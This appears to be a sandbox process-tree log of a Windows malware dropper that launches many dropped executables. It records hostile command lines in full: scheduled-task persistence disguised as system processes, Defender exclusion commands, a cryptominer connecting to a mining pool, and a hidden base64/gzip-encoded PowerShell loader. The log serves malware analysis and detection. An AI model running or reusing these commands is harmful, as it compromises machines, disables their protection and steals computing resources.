"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
5⤵
PID:788

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="788.0.1722132172\1106579958" -parentBuildID 20221007134813 -prefsHandle 1012 -prefMapHandle 1004 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88735c0b-038e-4057-ba7f-b55a6804ef10} 788 "\\.\pipe\gecko-crash-server-pipe.788" 1140 41f9358 gpu
6⤵
PID:4188

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="788.1.26584450\639402377" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1268 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff9bc7d9-8822-42e2-bc49-bb7026461406} 788 "\\.\pipe\gecko-crash-server-pipe.788" 1284 4044e58 socket
6⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\CFWE7ef5N6KgEFkrT1pq.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\CFWE7ef5N6KgEFkrT1pq.exe"
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\6ZUll2_LeOc2WKnc4iPl.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\6ZUll2_LeOc2WKnc4iPl.exe"
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\4EgnvQHn0HnHYLk_7ulm.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\4EgnvQHn0HnHYLk_7ulm.exe"
3⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\gGPt1P95s_8ZCeejzLSy.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\gGPt1P95s_8ZCeejzLSy.exe"
3⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1252

C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2080

C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"
2⤵
- Executes dropped EXE
PID:2996

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:1044

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8009.tmp.bat""
3⤵
PID:2248

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2584

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
PID:976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:1048

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:1248

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
5⤵
PID:2672

C:\Users\Admin\AppData\Local\Temp\Files\Recorder.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Recorder.exe"
2⤵
PID:2300

C:\Users\Admin\AppData\Local\Temp\Files\lve5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lve5.exe"
2⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
2⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
PID:1776

C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_NKwtUN.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_NKwtUN.exe"
2⤵
PID:1072

C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe"
2⤵
PID:3644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:2132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
3⤵
PID:2160

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
4⤵
- Creates scheduled task(s)
PID:4440

C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe
"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe"
2⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
3⤵
PID:3776

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
4⤵
PID:5108

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:4552

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
5⤵
- Creates scheduled task(s)
PID:4424

C:\Users\Admin\AppData\Local\Temp\nsuB7EC.tmp
C:\Users\Admin\AppData\Local\Temp\nsuB7EC.tmp
3⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\Files\she.exe
"C:\Users\Admin\AppData\Local\Temp\Files\she.exe"
2⤵
PID:4576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDAHQAOABLAEYAMABDAEEANwBWAFcALwAyAC8AYQBSAGgAVAAvAHUAWgBYADYAUAAxAGcAVABFAHIAWgBHAHcAUwBZAGsAVABTAHQAVgBtAGcAMAAyAHQAZwBzAEUATwBHAHcAQwBHAGEAcQBNAGYAZABnAFgAegBsADkAaQBuAHcATgAwADIALwArACsAZAA0AEQAVABiAEcAMgAzAGQAdABLAHMAUgBOAHkAOQBlADEAOAAvADcANwAxADcAdAB5AGsAVABuADUARQAwAEUAYgB5AHMARgBIADUANwA5AGYATABGADIATQB1ADkAVwBCAEIAcgBzAFcARQAyAGgARgBvAHgARwAwAGsAdgBYAGcAQwA1ADkAaABnAGsAdwBuAHQAQgB2AEYATwB6AHIASgBmAEcASABrAGwAVwA3ADkANQAxAHkAegB6AEgAQwBUAHYAdABtADMAMwBNADEASwBMAEEAOABaAG8AUwBYAEkAaQBTADgATABzAHcAagAzAEMATwBYADkAKwBzADcANwBIAFAAaABOACsARQAyAHMAZABtAG4ANgBaAHIAagA1ADcAWgBEAGwAMwBQAGoANwBEAHcAVwBrADAAQwBmAGoAWgBJAGYAWQArADcAMABrAFEAWgBKAFUAeQBzAC8ALwBwAHIAWABiAHAANwByAGEAeQBhACsAawBQAHAAMABVAEsAcwBvADAAUABCAGMATgB3AE0ASwBLADEATAB3AGgAOABTAE4AegBnADcAWgBGAGkAcwBEADQAbQBmAHAAMABXADYAWQBjADAANQBTAFMANwBhAFQAUwBjAHAAdgBBADAAZQBnAGIAWgBIAFAATQBRAHMAUwBvAE8AaQBMAGsARQBRADgASgBkAGoAVgB1AGEASgB3AE0AUABoADgAcQBkAFQAcwBRADcATABjAFoANwA2AGEAaABEAGsAdQBDAGoAcQBEAGUARwBPAGEANwA1AGIAcgBYADQAUgA3ADgANQBtAHAAMgBYAEMAUwBJAHkAYgBWAHMASgB3AG4AbQBZAEkANQA0AC8ARQB4ADAAWABUADkASgBLAEEANABpAG4AZQByAEUAQQBLAHMAWgB3AGsANABVAHEAUwBnAE8AMAB4ADMAVwBLAHgAbABwAFMAVQBOAG8AUQBmAFUAUwBPAE8AOABLADQAQwA3AFgAdQBGAHgATwBkAEMAdwBEAFYAbQB1AGQAUwBBAEwASAA0AFoANQBqAEEATgBTAG8AcABQAGcAdgBXAHYAKwBNAGsAVABMADgARgAzAFQAagA3AEEAOQBzAGUAcgBsADYAOQBlAGIAcQBvADYAVwBmAGQAdgA3AFAAYgB6AFMAbwBIAFYAaQA3AHYAagBHAG8ATgB6ADQAagBnAHQAeQBKAEgAeAB2AFMAQQAzAGgAQwBIAFkAOABWAGkAYQBIADIAQgBiAG0AKwBVAGwAbABsAFoAUAAwAEEAcQAxADUAUABIAGoAeAA3AHoAeABiAFEAVgBLAHgAUQAyADgAaAAxADAARwBsAEQAcwAzAEoAYwBFAEsASgBNADcAcAByAEoAVQBhADgAagBqADkAMgAyAFgAWgB3AHgAdQBTADQATgA0AGgAOABXAEwAaQBWADUAVQBuAGYAZwAxAGsAdgBLAEgANABHAEcAUwB6AFkAaAB1AEIAVAAyAEwAOQBmAEkAQwBEAEgAcQBZADQAOQBCAGoASABqAGUAZgA2AEMAegBFADkASgB1AHgASgBWAGkAcwBKAEQAWABDAHUAKwBwAEMAbwBBAHIAeQBDAEgARQBwAC8AZABlAGEAVQBDAHIARgB1AEoAVQBNAGMAQQAwAGEAbgBQAFIAUgBmAGIAUQBQADEAagBpAHYAdQBjADQAMABmAEsAdQB0ADgARAAwAHoAMQBMAHYAVwBLAG8AaQBHAE0AUwAyAGcANAB2AHkARQBnADcARgBFAGMATgBBAFEAMQBLAGMAagA1AFMAQwAxAFoAZQBsAHoAVwBQADcAcwA3AEwAQwBrAGoAdgBsAGUAdwBTAHQAMQBLAHEAbgBBADgAMgArAHUAbQBTAGMASAB5ADAAbwBlADAAUQBlAHcAegBsAEcARwBmAGUASgBSAEQAMABSAEIATQBFAG0ARAB0AGcARQBoAFkAMgBhADEALwBGAFkAaQB1AFIAeQBuADAAQQBXAGgANgBoAEUAUQBBAGgAUQBPAEEARwBDACsARwBIAEYAdwA4AEoAVgA1AHEASQBzAHkAcwBPAEsATQA0AEIAcQBaAGoANgB4AHYAVQBDADYASABSAHoAKwBWACsATABCADgAdgB4AEUASAA5ADcAeQA1AFcAOQBYAHcAcQBYAGcANQBHAGgAYwBJAHoAQgB5AEgARABpAEsAYQBzAEkAYgBnAGsAWgAzAEMARABjAEcAQwBoAGkAdgA2AGoAKwBXAGQAMwB4ADkARwBSAGIAbwA3AFAAdQBSAEMAcgBIAHIAbgBUAEQAbwB3AFgAZABtADIAagB2AGUARQAxAGUAYwBiAGwAaQBFAEwATwBBAEEARQBqAFQAMgBQAE4ASwAvAEIAVgA1ADMAUgBQAGkARAArADEAZABOAEsANwBIAFAAZgBTAFQAeQBwADgAdQBqAEcAZAB1AEIAcAB5ADMASwBVADEARABHAHkASwBMAEkAWQBXAE8AaABrADQAVQBXAFEAUgB4AFEAcABoAGYAMwBEADAAYwBNAHoAawA3AE0ATgBzAFoAdABxAG8AWgA2AHAANQBiAHgAOQB0AFYASwB1AHcAZABGAE0ANwBUAEIAUgBOADkAVQAzAHkAeAByAFUAMQB4AHcARQA1ADAAaAAxAE0ANwB2AGUAVwBHAG0AaAB4AGUAQgBzAHUAdQBqAHQAcgBIAE4AMQBhAFkASwBnADcAQwBLADAAUQBmAGoAVQByADgAagBWADUASwBZAGUAYQBiAEgAUQBIAFMASQB0ADAASQBxAHMAaABtAHAAaQBUAGoAcgBLADAAVwB0AGQAVQBJADUAKwBRAGgAVgBSAHoALwBtAFQAdgB5AFkANwBlADYAWgBpADMAKwA1AGsANgBHAHQAcABxAFoATgB3AEUAaAB0AEkAMgBqAHYASgBiAEwAcgAvAGMAOQBnAGMAOQAvAGIAagAzACsAWAA2AHkASwBIAFMAaQBnAHgAMwBkAFcARQB6AGMAQwBNAC8AZABUAEoAdgByAHgAbgBMAGkAWgBsAGIANAA4AHkANgBjAHUASQBOAFcAeAA0AGcAMABvAEYAdABrAFAAOABoAFEAQwB6ADUARgBBAFIAegBZAEQASwAwAHYATAA3AHoANQBaAGIAYQBPAFgAUgBrAHcAbQBpAE0AcgBpAFoAQwAvADYAYwA1AE0AUAA5AFoAYQBMAGQAZABSAFIAaABiAEIAeABtAHkAKwBsAGYAYwA3AFgAZAA0AGYAMwBCAEgASQBwAEYAZAB1AEUAaQBjAGMAVgBuAFgAYwBjAHEAOQBVAG0AYQArAFUAdwBiADAAdQAzADMAUQA3AG4ANABhAGsAYwB4AGoAZQBXACsAcAA4AFMAKwB5AGQAawA1AGkANwBjAFEARwBBAGEASwBPAGgAVAAyAGQATwBPACsAMAA1AGMAbgB6AGwAZAB1AEwATgBuAHMATwBrADkAbABvAEsAagBxADcANABhAHQARAB1AEsASABQAGQALwByAEIAbwA3ADQAMABnAGQAZwAwADMAcABzAGkAUgA5AHoATQBrAEwAMwBmAHIAZABqAEQARwBqAGkAMwA3AC8AWAAyADYAdgBOAGUAcwBtAGIATwBQAC8AZgBsADEARwB6AHQAVQBXAFoAdQBHAHUAWgB4AGYAVABpAGYAYgA2AFcAQwA1AG4AUgBxAEIAcQBZADIASABjAFQAWgBCAE8AbAAwAHUANQBCAEYAQwAyADYAVwAxAGIAbAA5ADIAWgBzAGwAawBqAC8AWABvAEIAbwBJAHkAcAAzAEoARQBQAGQAbQAvAGMAQgBMADEAMAAxAG8AWgBRAGYAUQB5AGMAeABQAGEAQwA1AHoAcABoAFUAdQBVAE4AcAA1AGYATABtAGQAeAB0AGgAdwA0AEkAdwBkADAAZQA0AHYAMgA1AFIASgBOAE4ASQB2ADQASABBAHQAagB3AFgAUABtAHkASwBTAGoAOQBqADYARQAwAFIARQBJAGIAUQBKAFkAMgBmAHYAcgBRAGUANgBpAHoAcAB2AFcAVwB4AGQANABsAHcAOQBkACsAdABZAGkARwArAFAAQgBWAEQATABrAFcAUwBxAFUAbwBtAFkAVAByAEQAMQBvAGsAQgArADAAegBwAFIAcABkAHQAVwB2AGMAQQBTAGQAcQBxAE4AawBuAEoAOQBqAGQAYwBKAEwAQgB2AHkASQAzAE8AKwBiAGoAeQAxAGwAYwBhAHMARwAwADcAZgBXAC8AcgBwAHYANgBUAHQAVgBCAFgAbgA5AHUAbgBjAGIAVgB2AEoAbwAzAEIAbwBIADYAaQBCAC8ASwBDAE8AWABrAHgAeQBGAFAAawB5AE0AegBDAFkAQQBTAEMAZgBTAHcARABkAG8AQQAvAFUAbwB0ADgAaQBNAE0AWAAyAFMAcwAwAGQAZwBoADkAaQBYADgASAAvAHQARQBMAHUAOQBCAFoAdQBxAEcAaAA1ADkAMwBWAEMANwBqAEQANwBNAEMAYgBhAE8ANwBEAHkAdQA4AEgAbwBTADgAdABvAHUAWQBtACsAZwBRAFgAMwB2AE8AdQBCAFgAWQBDADkAMgBTAHYAUwBnAEcAcABSAGoAcwBHAE8AZQBQAFcAKwA5AGQAZAA3AC8AeABOAHMAYgArAHIAdQBXAEIAcwArADYAOQBsAHMAagBkACsAagBsAFIAZQBSAFIANgBHAFkAWQBwAHQAVQBkAGEAcQBTADUAYwBSADYAUQA0ADUAUgB3AEMAVgBIAGsARAA2AG8AdAB6AGgATgBNADQAVQBVAEMAYgA1AGIAcQBHAGwASQBwAFQAWAAwACsAbgBFACsAVABGAEYANABHAHAAMwBuAE4AbgB3ADgATwBMAEMALwBhAFgAMQAxAEoAdwBoAE8AagA5AEgAbABzAFYANgBSADMANwA1AGIAZwBKAFoAOABjADIAcAB2AG0AQQBDAGMAaABpAHgAcgB5AC8AawBLAFcAWQBRAGIATAArADQANABNAEkAWAA1AC8AWQBOADAAMABPADQAaABjAFUANABPAFAAYwBJAEQAbAByAEoAYwBlADkAVQByADgAcQBxAHYAUgBjAHAAagA4AHIAMgBpAGQANwA5AGMASQBmAG8ASgAvAFIAZQBzAHoANwBSADkATwB2AHcAdABCAHUAYwBIAGoALwBZAEwANABWADgASQBQAG8AZgBtAGoAZwBjADgAOQB3AG8AQQBSAHcAWAB5AGcAKwBQAFIAQwArAFUAYgA4ADUAOABKADQAOQBvAGoAagBXAFkARwA4AGIAOAA0AGYAZgA0AFAAZgBsAE8AegAxAEMATgA1ADIAcgAxADcAKwBDAFEAZABYAFAAMQBqAHIAQwB3AEEAQQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
3⤵
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
4⤵
PID:3388

C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
2⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
3⤵
PID:3668

C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
2⤵
PID:2748

C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
2⤵
PID:3968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 216
3⤵
- Program crash
PID:3384

C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"
2⤵
PID:3276

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp43B5.tmp.bat""
3⤵
PID:1780

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:4876

C:\ProgramData\common\JTPFKOXW.exe
"C:\ProgramData\common\JTPFKOXW.exe"
4⤵
PID:3076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
3⤵
PID:5096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:3804

C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe
"C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"
2⤵
PID:4260

C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
2⤵
PID:3852

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
2⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
3⤵
PID:2256

C:\Users\Admin\AppData\Local\Temp\Files\app1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"
2⤵
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Recovery\9064cc02-9ba8-11ee-8a7b-e6b52eba4e86\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\9064cc02-9ba8-11ee-8a7b-e6b52eba4e86\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\9064cc02-9ba8-11ee-8a7b-e6b52eba4e86\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PresentationFontCacheP" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Favorites\PresentationFontCache.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1528

